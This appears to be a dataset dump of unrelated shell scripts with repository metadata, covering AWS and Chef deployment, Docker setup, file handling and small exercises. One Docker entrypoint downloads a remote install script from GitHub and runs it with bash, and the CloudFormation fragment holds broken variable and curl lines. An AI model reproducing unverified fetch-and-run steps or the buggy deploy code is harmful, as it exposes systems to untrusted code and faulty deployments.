--capabilities CAPABILITY_IAM \
--tags \
Key="application",Value=${app_name} \
Key="branch",Value=${repository_branch} \
--parameters \
ParameterKey=VpcId,ParameterValue=${aws_vpc} \
ParameterKey=AWSKeyPair,ParameterValue=${aws_keypair} \
ParameterKey=ASGSubnetIds,ParameterValue=\"${aws_subnets}\" \
ParameterKey=ASGAvailabilityZones,ParameterValue=\"${aws_azs}\" \
ParameterKey=AppName,ParameterValue=blog_refactor_nodejs \
ParameterKey=PropertyStr,ParameterValue=${PropertyStr:-banjo} \
ParameterKey=PropertyNum,ParameterValue=${PropertyNum:-144} \
ParameterKey=PropertyBool,ParameterValue=${PropertyBool:-true} \
ParameterKey=PropertyUrl,ParameterValue=${PropertyUrl:-https://jqplay.org/}
aws cloudformation wait stack-create-complete --stack-name ${asg_stack_name}
echo $(aws cloudformation describe-stacks --stack-name ${rds_stack_name} 2>/dev/null) > .working-folder/app.tmp
elb_dns=$(cat .working-folder/app.tmp | jq '.Stacks[0].Outputs[] | select(.OutputKey == "DNSName") | .OutputValue')
elb_url="https://%{elb_dns}"
# post-deploy smoke test
curl elb_url
| true
|
4e97e7763b083328c5e789bd006d5e3ad2b67c15
|
Shell
|
anshulm/knife_solo-experiments
|
/config/pull_the_trigger.sh
|
UTF-8
| 626
| 3.484375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# check for correct number of arguments
if [ $# -ne 3 ]; then
echo "Usage: $0 <user> <ip> <port>"
exit 1
fi
# set variables
USER=$1
IP=$2
PORT=$3
# upload key for root - need to have a root user. Check EC2 specific changes
ssh-copy-id -i ~/.ssh/id_rsa.pub -p $PORT vagrant@$IP
# install chef
#cd chef && knife solo prepare -p $PORT vagrant@$IP
cd chef
# execute the run list
knife solo cook -p $PORT vagrant@$IP
# upload key for user
ssh-copy-id -i ~/.ssh/id_rsa.pub -p $PORT $USER@$IP
# upload app
cd ../.. && cap production deploy
# restart nginx
ssh -p $PORT -t $USER@$IP 'sudo service nginx restart'
| true
|
aa1d0b11077208a86228e74c3b82967cbab23156
|
Shell
|
igorper/med-seq-explorer
|
/compres.sh
|
UTF-8
| 684
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
input_folder="/scratch/users/pernek/results/search_tseq_nint_*/"
tmp_folder="/scratch/users/pernek/results/tmp/"
while getopts ":i:" opt; do
case $opt in
i)
input_folder=$OPTARG
;;
\?)
echo "Invalid option: -$OPTARG" >&2
exit 1
;;
:)
echo "Option -$OPTARG requires an argument." >&2
exit 1
;;
esac
done
echo "Compressing folder $input_folder"
mkdir -p $tmp_folder
for d in $input_folder ; do
filename=$(basename $d)
echo $filename
cp "${d}part-00000" $tmp_folder$filename
done
cur_folder=$(pwd)
echo $cur_folder
cd $tmp_folder
zip -r "results.zip" .
mv "results.zip" $cur_folder
rm -r $tmp_folder
| true
|
c490e861858429086aa6a1f922cdaebbe1776c1b
|
Shell
|
yuliujuan/docker-pan
|
/entrypoint.sh
|
UTF-8
| 753
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
set -eux
if [ ! -e /var/www/html/index.php ]; then
echo "[FileRun fresh install]"
unzip /filerun.zip -d /var/www/html/
cp /autoconfig.php /var/www/html/system/data/
mkdir -p /user-files/superuser/dl
#wget https://gist.githubusercontent.com/jae-jae/9b09a9bf90b733aed896713f56c8a1f2/raw/install-aria2-ui.sh
wget https://raw.githubusercontent.com/yuliujuan/files/master/install-aria2-ui.sh
bash install-aria2-ui.sh
# rm -R /var/www/html/dl/files
# ln -s /user-files/superuser/dl /var/www/html/dl/files
chown -R www-data:www-data /var/www/html
chown -R www-data:www-data /user-files
/wait-for-it.sh db:3306 -t 120 -- /import-db.sh
fi
exec "$@"
| true
|
61d76d988afbdc6f1a5161f7d6c7dab9f6fb0ebf
|
Shell
|
leblanck/macOS-Scripts
|
/ExtensionAttributes/AccountinOSXMail.sh
|
UTF-8
| 382
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
#Get Logged in Users
userName=$(defaults read /Library/Preferences/com.apple.loginwindow.plist lastUserName)
echo $userName
mailContents=$(ls /Users/$userName/Library/Mail)
echo $mailContents
size=${#mailContents}
if [[ "$size" -gt "1" ]]; then
echo "<result>Account Enabled in macOS Mail</result>"
else
echo "<result>No Account found in macOS Mail</result>"
fi
| true
|
5a185c87f2960640701cd864da5468ca3e67a53f
|
Shell
|
ZavalichiR/Backup
|
/SO/Teste/Test 1/4/createfis.sh
|
UTF-8
| 600
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
if [[ ($# < '1') || ($# > '9') ]];then
echo "Numarul argumentelor este gresit"
exit
fi
ls
verificare ()
{ if [[ -d $1 ]];then
return 0
elif [[ -f $1 ]];then
return 1
else
return 2
fi
}
verificare $1
rez=$?
echo "$rez"
if [[ $rez == '0' ]];then
echo " Exista deja un director cu acest nume "
exit
elif [[ $rez == '1' ]];then
echo "Exista deja un fisier cu acest nume"
exit
fi
mkdir $1
cd $1
for parametru in $* #parcurge lista de argumente
do if [[ $parametru == $1 ]];then #evitam sa creem un fisier cu acelsi nume ca al directorului
continue
fi
touch $parametru
done
| true
|
03dc5ec64700fe9c67a778638dfb8e8973adad93
|
Shell
|
miloooooz/Data-Structure-and-Algorithms
|
/Solvability of the NxN sliding tile puzzle/test.sh
|
UTF-8
| 791
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/sh
PROG=./puzzle # running program
DIR=Tests # directory of testcases
case $1 in
"1") T=$DIR/bad* ;;
"2") T=$DIR/sol* ;;
"3") T=$DIR/unsol* ;;
"4") T=$DIR/* ;;
esac
# if we have valid command
if [ A$T != A ];
then
# test all selected testfiles
for i in $T
do
echo ================= $i ================== | tee -a "$DIR/result.log"
# print result to the terminal, and save it to the log file as well
result= $PROG < $i | tee -a "$DIR/result.log"
done
elif [ ! $T];
# print out error msg
then echo "Usage:\n $0 [1|2|3|4]\nCommands:\n 1: bad input\n 2: sol input\n 3: unsol input\n 4: all testfiles"
else echo "Usage:\n $0 [1|2|3|4]\nCommands:\n 1: bad input\n 2: sol input\n 3: unsol input\n 4: all testfiles"
fi
| true
|
9a5b9bf93268801d8f6c4967430bf244fd3cd328
|
Shell
|
Daviddddl/ssm-demo
|
/src/main/webapp/data/see.sh
|
UTF-8
| 105
| 2.6875
| 3
|
[] |
no_license
|
for (( i=51,j=17; i<=73; i++,j++ ))
do
echo $i $j
#head -c 100 _$i.json
mv _$i.json _$j.json
done
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.